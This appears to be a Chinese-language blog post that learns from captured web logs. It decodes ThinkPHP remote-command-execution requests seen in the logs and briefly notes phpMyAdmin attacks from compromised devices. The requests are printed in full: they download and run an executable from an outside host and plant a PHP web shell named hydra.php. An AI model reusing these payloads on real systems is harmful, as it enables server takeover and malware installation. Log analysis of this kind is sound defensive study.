從 Web Log 學習系統漏洞 35

ThinkPHP 遠端命令執行漏洞

解碼後所執行的指令:
1. /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/10.exe');start C:/10.exe
2. /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php
3. /public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/10.exe');start C:/10.exe

從 Web Log 學習系統漏洞 34

其實從這種設備來的攻擊已經數不清了, 不曉得是設備的漏洞? 還是使用者裝了什麼有問題的軟體?

1. 對方的入侵Log, 大多也都是攻擊phpmyadmin

2. 從IP直接連到對方的NAS設備